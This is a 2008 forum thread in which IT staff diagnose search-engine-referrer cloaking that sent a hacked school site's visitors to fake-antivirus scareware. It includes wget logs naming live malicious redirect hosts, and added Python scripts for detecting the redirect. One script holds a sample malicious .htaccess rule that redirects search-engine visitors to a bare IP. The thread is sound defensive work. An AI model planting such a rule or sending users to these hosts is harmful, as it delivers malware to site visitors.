#1 Friez

    Virus Hunting Needle-In-A-Haystack

    DISCLAIMER
    DO NOT CLICK LINKS IN THIS THREAD UNLESS YOU'RE SURE YOU'RE TESTING IN A 100% SAFE ENVIRONMENT!

    With that over...

    Here is a pure funky issue we've come across and we would like your assistance please (although please be careful!)

    We had a report that our students were going to a legitimate school resource website and were instead being redirected to that nasty XP-Antivirus 2009 virus website.

    So off we go and dutifully investigate.

    The website we were going to is:
    (DISABLED TO PREVENT CLICK)
    www(DOT)sense-lang(DOT)org/typing/

    If we enter the URL in the web browser directly, it goes through to the site just fine. However, if we go to google.com and search for "sense lang" and click the link there we get redirected to the antivirus-virus site.

    It redirects to antivirusonlivescan.com DANGER! - Browsing to this page may infect!

    Now, we were thinking at first it was a DNS attack, but no! If it was, it would surely go to the wrong site if we typed the url straight.

    So it must be something with the link. Google itself actually links straight to the site, and the site seems clean when directly going there. The URL in the bar actually changes which indicates it's not a DNS attack. It's very odd.

    Even more strange is that if we go unfiltered, we don't suffer this problem.

    This made us think it was a problem with one of our proxies/filters.

    There are two proxies/filters in our path:

    { Internet } -> SWGfL Proxies (staffproxy.swgfl.org.uk / proxy.swgfl.org.uk) -> Smoothwall -> { Us }

    We connected via both the staffproxy and the standard proxy and eliminated Smoothwall from the equation (as we were still having the problem if we were on the SWGfL proxies).

    To me, it seems like something has hijacked the SWGfL proxy. We tried a few other search engines, and made our own web-page which linked to sense-lang and some of these were safe.

    Our own link was clean, as was live.com and a few minor search engines. But using Yahoo, AltaVista or ask.com returned virus-infected links.

    If anyone's brave enough to set up a virtual machine session and test through the proxies (even better if you're on the SWGfL), please see if you also suffer the same conditions and get erroneously linked off to said virus site.

    I for one am totally baffled as to how the redirect is happening.

    As for our machines, they're clean and have NOD32 installed. We also deny .exe files from being downloaded from every proxy in the pipeline. We are certain there isn't another virus sitting at our end.

    I'll be interested in peoples results, and please be careful!

    Thanks!
    Last edited by ZeroHour; 12th November 2008 at 04:22 PM. Reason: borking the link to prevent accidents - ZH

#2 Geoff
    The Google result is redirecting to
    Code:
    http://89.28.13.202/in.html?s=ix
    not the sense-lang.org site.

#3 Geoff
    If you whois the IP you find that it belongs to an ISP called STAR in Moldova. Therefore it's likely a compromised machine hanging off a broadband connection.

    http://www.db.ripe.net/whois?form_ty..._search=Search

#4 Geoff
    I've put the ip in the siteadvisor queue.

    89.28.13.202 | Web Safety Ratings from McAfee SiteAdvisor

    That'll work out how nasty it is.

#5 Friez
    Good finds, still confused as to how the search engines are linking the hijacked connection/virus but totally displaying info regarding the genuine site right down to the URL you link to instead... Plus now we get inconsistent results with being through a proxy or not, so I'm not convinced the proxy has any bearing on it at all.

    Sometimes we get through to the proper website via clicking a google link, but we ALWAYS get through to the proper site by putting it into the web-address bar.

    What's more funky is to view the google cache, looks like executable code!

#6 OutToLunch
    I'm using an unproxied direct link here on what I believe(!) is a clean machine. If I use your query of "Sense lang" and click the result link in Google, I get the redirect - however what is odd is that if I right click the link and copy/paste to the URL bar, I get http://sense-lang.org/typing/ - which is correct. If I then hit enter, it works and displays the correct website.

    It seems like the "Sense lang" website has been compromised in some way - look at the following wget. First one uses no referrer - same as typing into the URL bar or copying and pasting the link.

    Code:
    >wget "http://sense-lang.org/typing/"
    --12:24:37--  http://sense-lang.org/typing/
    Resolving sense-lang.org... 71.18.63.16
    Connecting to sense-lang.org|71.18.63.16|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 31718 (31K) [text/html]
    Saving to: `index.html'
    
    100%[=======================================>] 31,718      36.1K/s   in 0.9s
    
    12:24:39 (36.1 KB/s) - `index.html' saved [31718/31718]
    Code:
    >wget --referer=http://www.google.com http://sense-lang.org/typing/
    --12:25:35--  http://sense-lang.org/typing/
    Resolving sense-lang.org... 71.18.63.16
    Connecting to sense-lang.org|71.18.63.16|:80... connected.
    HTTP request sent, awaiting response... 302 Found
    Location: http://89.28.13.202/in.html?s=ix [following]
    --12:25:35--  http://89.28.13.202/in.html?s=ix
    Connecting to 89.28.13.202:80... connected.
    HTTP request sent, awaiting response... 302 Found
    Location: http://viewallclicks.com/soft.php?aid=0147&d=6&product=XPA&refer=bb1f0c2b3 [following]
    --12:25:36--  http://viewallclicks.com/soft.php?aid=0147&d=6&product=XPA&refer=bb1f0c2b3
    Resolving viewallclicks.com... 89.149.227.232
    Connecting to viewallclicks.com|89.149.227.232|:80... connected.
    HTTP request sent, awaiting response... 302 Found
    Location: http://proffesional-scan.com/2009/1/freescan.php?nu=880147 [following]
    
    --12:25:36--  http://proffesional-scan.com/2009/1/freescan.php?nu=880147
    Resolving proffesional-scan.com... 89.149.253.215, 78.159.118.217
    Connecting to proffesional-scan.com|89.149.253.215|:80... connected.
    HTTP request sent, awaiting response... 302 Found
    Location: en/freescan.php?id=880147 [following]
    --12:25:36--  http://proffesional-scan.com/2009/1/en/freescan.php?id=880147
    Reusing existing connection to proffesional-scan.com:80.
    HTTP request sent, awaiting response... 200 OK
    Length: 1386 (1.4K) [text/html]
    Saving to: `freescan.php@id=880147'
    
    100%[=======================================>] 1,386       --.-K/s   in 0s
    
    12:25:36 (46.8 MB/s) - `freescan.php@id=880147' saved [1386/1386]
    That result is consistent/repeatable.

    Trying to grab the 89.28.13.202/in.html file without a parameter gets you a 302 back to Google. Clever.
    Last edited by OutToLunch; 12th November 2008 at 01:31 PM.

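OutToLunch's two wget runs are the whole diagnostic: same URL, same DNS answer, different response once a Referer is sent. The script below turns that into a repeatable check. It is an added example, not code from the thread: it walks every 3xx hop by hand (so the full chain is visible, and a relative `Location` like the one proffesional-scan.com returned is resolved correctly) and compares the host reached with no Referer against the host reached with each search-engine Referer. The `fetch` callable is injected; `fake_fetch` and `FAKE_HOPS` are constructed from the hostnames in OutToLunch's output so the check runs offline, and the assumption that Google, Yahoo, AltaVista and Ask trigger the redirect while live.com does not simply mirrors what Friez reported. `http_fetch` is a plain stdlib fetcher for live use, and only from an isolated VM given where this chain ends.

```python
"""Compare the redirect chain a URL returns with and without a Referer header.

Added example, not code from the thread. Hostnames in the fake below come from
OutToLunch's wget output; the behaviour behind them is constructed.
"""
import http.client
from typing import Callable, Dict, List, Optional, Tuple
from urllib.parse import urljoin, urlsplit

# fetch(url, headers) -> (status, lower-cased response headers); must NOT follow redirects itself
Fetch = Callable[[str, Dict[str, str]], Tuple[int, Dict[str, str]]]
MAX_HOPS = 10


def follow_chain(url: str, fetch: Fetch, referer: Optional[str] = None) -> List[str]:
    """Walk 3xx Location hops by hand and return every URL visited, first to last.
    The same Referer is sent on every hop, as `wget --referer` does."""
    headers = {"User-Agent": "Mozilla/5.0"}
    if referer:
        headers["Referer"] = referer
    chain = [url]
    for _ in range(MAX_HOPS):
        status, resp = fetch(chain[-1], headers)
        location = resp.get("location")
        if not (300 <= status < 400 and location):
            break
        # Location may be relative (proffesional-scan.com answered "en/freescan.php?id=...")
        chain.append(urljoin(chain[-1], location))
    return chain


def referer_cloaking(url: str, fetch: Fetch,
                     referers: Tuple[str, ...] = ("http://www.google.com/",
                                                  "http://search.yahoo.com/",
                                                  "http://www.ask.com/",
                                                  "http://www.live.com/")) -> Dict[str, List[str]]:
    """Return {referer: chain} for each Referer whose final host differs from the
    host reached with no Referer at all. An empty dict means no cloaking was seen."""
    baseline_host = urlsplit(follow_chain(url, fetch)[-1]).netloc
    suspicious: Dict[str, List[str]] = {}
    for ref in referers:
        chain = follow_chain(url, fetch, referer=ref)
        if urlsplit(chain[-1]).netloc != baseline_host:
            suspicious[ref] = chain
    return suspicious


def http_fetch(url: str, headers: Dict[str, str]) -> Tuple[int, Dict[str, str]]:
    """Live fetcher: one plain http.client request, no redirect following.
    Only point this at the hosts in this thread from an isolated test VM."""
    parts = urlsplit(url)
    conn = http.client.HTTPConnection(parts.hostname, parts.port or 80, timeout=10)
    path = (parts.path or "/") + ("?" + parts.query if parts.query else "")
    conn.request("GET", path, headers=headers)
    resp = conn.getresponse()
    resp.read()
    conn.close()
    return resp.status, {k.lower(): v for k, v in resp.getheaders()}


# --- constructed offline stand-in for the hijacked site and the hop chain seen with wget ---
HIJACK_REFERERS = ("google.", "yahoo.", "altavista.", "ask.")  # assumption matching Friez's observations
FAKE_HOPS = {
    "http://89.28.13.202/in.html?s=ix":
        (302, {"location": "http://viewallclicks.com/soft.php?aid=0147&d=6&product=XPA&refer=bb1f0c2b3"}),
    "http://viewallclicks.com/soft.php?aid=0147&d=6&product=XPA&refer=bb1f0c2b3":
        (302, {"location": "http://proffesional-scan.com/2009/1/freescan.php?nu=880147"}),
    "http://proffesional-scan.com/2009/1/freescan.php?nu=880147":
        (302, {"location": "en/freescan.php?id=880147"}),
    "http://proffesional-scan.com/2009/1/en/freescan.php?id=880147": (200, {}),
}


def fake_fetch(url: str, headers: Dict[str, str]) -> Tuple[int, Dict[str, str]]:
    """Serves sense-lang.org normally unless the Referer is one of the hijacked search engines."""
    ref_host = urlsplit(headers.get("Referer", "")).netloc
    if url == "http://sense-lang.org/typing/":
        if any(marker in ref_host for marker in HIJACK_REFERERS):
            return 302, {"location": "http://89.28.13.202/in.html?s=ix"}
        return 200, {}
    return FAKE_HOPS.get(url, (404, {}))


if __name__ == "__main__":
    for ref, chain in referer_cloaking("http://sense-lang.org/typing/", fake_fetch).items():
        print(f"Referer {ref} ends at a different host:")
        print("  " + "\n  -> ".join(chain))
```

Swap `fake_fetch` for `http_fetch` to test a real site; the empty-dict result is the "clean" case, and any non-empty result lists the exact hops, which is what you want to hand to the site owner or a blocklist maintainer.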

#7 Friez
    That's very interesting indeed! And it must be picking up specific referrers too, as we've clicked through on some other search engines and it's a-ok.

#8 Hightower
    If you own a site you don't Google it. Therefore when you type in the address www.website.com (of your site) you get through to it fine.

    When other users want to find it they Google it and get a virus.

    It's a very clever ploy that can hand a virus to lots of users, but when the admin gets reports and types in his web address he doesn't see anything wrong.


#9 Geoff
    Leads back to a Russian spyware site in the end anyway. I agree. The sense-lang.org site has been compromised.


#10 Friez
    Thanks for the research, quite a sneaky one too. Definitely one to look out for, especially with the number of students/teachers that can't follow instructions and put URLs straight into Google.

#11 ZeroHour
    Very useful to know, nice work all. They get smarter all the time.
    I have moved this to Security as it seems more relevant there.

    +rep for reporting it

#12 WavMaker

    Check .htaccess

    I discovered earlier this morning that the same thing was happening with my web site. Viewing any of my URLs directly worked fine, but any referrals to my site from Google were instead getting sent to http://89[DOT]28[DOT]13[DOT]202/in.html?s=ix

    I checked a number of complex possibilities, searching for an answer, without success. Then I decided to check a simple answer -- I checked my web site's root directory to see if someone had planted a rogue file in there.

    I immediately discovered that my .htaccess file had been modified -- by someone other than me -- and replaced with code that sent any referrals from the major search engines to the URL above.

    I'm not sure how someone was able to replace my .htaccess file with their own code, but that's what happened. Naturally I've now removed their "pirate code" and put my own .htaccess file back in place. Now Google referrals are working properly.
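WavMaker found the cause by looking at the simplest thing first: a modified .htaccess. The rogue file itself was not posted, so the script below is an added example rather than the code from the thread. It parses mod_rewrite directives the way Apache groups them (each RewriteCond belongs to the RewriteRule that follows it) and flags any rule that redirects off-site, noting whether it is gated on `%{HTTP_REFERER}`, whether that gate names search engines, and whether the target is a bare IP, which is exactly the shape of the redirect seen in this thread. `SAMPLE_HTACCESS` is constructed to show the pattern; 203.0.113.10 is a documentation address standing in for the 89.28.13.202 seen here, and `example.org` stands in for your own hostnames.

```python
"""Flag referrer-conditional off-site redirects in an Apache .htaccess.

Added example, not the rogue file WavMaker found (that file was not posted).
SAMPLE_HTACCESS below is constructed to show the pattern the thread describes.
"""
import re
import sys
from typing import Dict, List
from urllib.parse import urlsplit

IPV4 = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")
SEARCH_ENGINE_WORDS = ("google", "yahoo", "altavista", "ask", "msn", "live", "bing", "aol")


def parse_rewrite_rules(text: str) -> List[Dict]:
    """Pair each RewriteRule with the RewriteCond lines directly before it
    (mod_rewrite semantics: conditions belong to the next rule only)."""
    rules: List[Dict] = []
    pending: List[Dict] = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        directive = parts[0].lower()
        if directive == "rewritecond" and len(parts) >= 3:
            pending.append({"test": parts[1], "pattern": parts[2]})
        elif directive == "rewriterule" and len(parts) >= 3:
            rules.append({"pattern": parts[1], "target": parts[2],
                          "flags": parts[3] if len(parts) > 3 else "", "conds": pending})
            pending = []
    return rules


def find_referer_hijacks(text: str, own_hosts: List[str]) -> List[Dict]:
    """Report every rule that redirects to a host we do not own, noting whether it
    is gated on HTTP_REFERER, whether that gate names search engines, and whether
    the target is a bare IP address (as the redirect in this thread was)."""
    findings = []
    for rule in parse_rewrite_rules(text):
        target = rule["target"]
        if not target.lower().startswith(("http://", "https://")):
            continue  # internal rewrite, not an off-site redirect
        host = (urlsplit(target).hostname or "").lower()
        if host in own_hosts:
            continue
        referer_conds = [c["pattern"] for c in rule["conds"]
                         if c["test"].upper() == "%{HTTP_REFERER}"]
        findings.append({
            "target": target,
            "raw_ip_target": bool(IPV4.match(host)),
            "referer_conditional": bool(referer_conds),
            "search_engine_referer": any(w in p.lower() for p in referer_conds
                                         for w in SEARCH_ENGINE_WORDS),
            "conds": referer_conds,
        })
    return findings


# Constructed sample: a hijack rule of the kind described, then a benign canonical-host rule.
# 203.0.113.10 is a documentation address standing in for the thread's 89.28.13.202.
SAMPLE_HTACCESS = """\
RewriteEngine On
RewriteCond %{HTTP_REFERER} (google|yahoo|altavista|ask)\\. [NC,OR]
RewriteCond %{HTTP_REFERER} msn\\. [NC]
RewriteRule .* http://203.0.113.10/in.html?s=ix [R,L]

RewriteCond %{HTTP_HOST} ^example\\.org$ [NC]
RewriteRule ^(.*)$ http://www.example.org/$1 [R=301,L]
"""


def main(argv: List[str]) -> int:
    """Usage: audit_htaccess.py <.htaccess> <own-host> [own-host ...]; no args runs the sample."""
    if len(argv) < 3:
        text, own = SAMPLE_HTACCESS, ["example.org", "www.example.org"]
    else:
        with open(argv[1], encoding="utf-8", errors="replace") as fh:
            text = fh.read()
        own = [h.lower() for h in argv[2:]]
    findings = find_referer_hijacks(text, own)
    for f in findings:
        print(f"off-site redirect to {f['target']}: referer-gated={f['referer_conditional']}, "
              f"search-engine-referer={f['search_engine_referer']}, raw-ip={f['raw_ip_target']}")
    return 1 if findings else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it over every .htaccess under the document root (a compromise like this one can plant the file in any subdirectory, not just the root), and treat a non-zero exit as a reason to also check the FTP account, since that is how the file got there in WavMaker's case.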

#13 dhicks
    Quote Originally Posted by Friez View Post
    that nasty XP-Antivirus 2009 virus website.
    There's an article about this in this month's PC Pro, with quite a detailed explanation of how it works. One phrase mentioned was "drive-by download". I assume this shouldn't be a problem with a decent, recently patched web browser, but could it be that Internet Explorer still has some vulnerabilities?

    --
    David Hicks

#14 ZeroHour
    Quote Originally Posted by WavMaker View Post
    I discovered earlier this morning that the same thing was happening with my web site. Viewing any of my URLs directly worked fine, but any referrals to my site from Google were instead getting sent to http://89[DOT]28[DOT]13[DOT]202/in.html?s=ix

    I checked a number of complex possibilities, searching for an answer, without success. Then I decided to check a simple answer -- I checked my web site's root directory to see if someone had planted a rogue file in there.

    I immediately discovered that my .htaccess file had been modified -- by someone other than me -- and replaced with code that sent any referrals from the major search engines to the URL above.

    I'm not sure how someone was able to replace my .htaccess file with their own code, but that's what happened. Naturally I've now removed their "pirate code" and put my own .htaccess file back in place. Now Google referrals are working properly.
    What version of Apache are you running, and on what OS?
    It would be good to know why you were hacked, to warn others. Thanks for the post, and welcome to EduGeek as well.

#15 WavMaker
    My site is hosted at IXwebhosting.com. I've seen posts from other IX clients that their sites are being attacked the same way. The rogue .htaccess file is being uploaded via FTP. I've changed my FTP password.

    I'm on a Linux server with Apache 1.3.31.
